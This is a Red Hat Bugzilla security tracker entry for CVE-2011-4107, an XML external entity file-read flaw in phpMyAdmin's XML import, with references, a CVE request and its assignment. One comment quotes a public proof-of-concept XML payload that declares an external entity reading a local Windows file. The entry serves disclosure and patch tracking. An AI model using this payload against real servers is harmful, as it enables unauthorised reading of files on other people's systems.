Bug 751112 (CVE-2011-4107)

Summary: CVE-2011-4107 phpMyAdmin: Arbitrary file read flaw by loading XML strings
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: redhat-bugzilla, vdanen
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2014-07-19 15:44:11 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Jan Lieskovsky 2011-11-03 14:57:10 UTC
A local file inclusion flaw was found in the way XML import plug-in of phpMyAdmin, a tool written in PHP intended to handle the administration of MySQL over the World Wide Web, performed import of malformed XML files. A remote attacker could provide a specially-crafted XML file, which once imported into the phpMyAdmin service instance would lead to arbitrary local file (accessible with the privileges of the phpMyAdmin user) read / retrieval.

References:
[1] http://seclists.org/fulldisclosure/2011/Nov/21
[2] http://www.wooyun.org/bugs/wooyun-2010-03185

Comment 1 Jan Lieskovsky 2011-11-03 15:12:41 UTC
CVE request:
[3] http://www.openwall.com/lists/oss-security/2011/11/03/3

Comment 2 Jan Lieskovsky 2011-11-03 15:14:21 UTC
Public PoC from [1] (for Microsoft Windows OS though):
======================================================

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>



<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/";>

    <!--

    - Structure schemas

    -->

    <pma:structure_schemas>

        <pma:database name="test" collation="utf8_general_ci"
charset="utf8">

            <pma:table name="ts_ad">

                &hi80sec;

            </pma:table>

        </pma:database>

    </pma:structure_schemas>



    <!--

    - 数据库: 'thinksns'

    -->

    <database name="thinksns">

        <!-- 表 ts_ad -->

    </database>

</pma_xml_export>

Comment 3 Jan Lieskovsky 2011-11-03 15:15:23 UTC
Regarding upstream patches (not sure phpMyAdmin upstream provided a changeset for this issue already, since it was reported two days ago). Cc-ed them on the CVE request for further patch information.

Comment 4 Vincent Danen 2011-11-04 04:31:49 UTC
This has been assigned the name CVE-2011-4107:

http://www.openwall.com/lists/oss-security/2011/11/03/5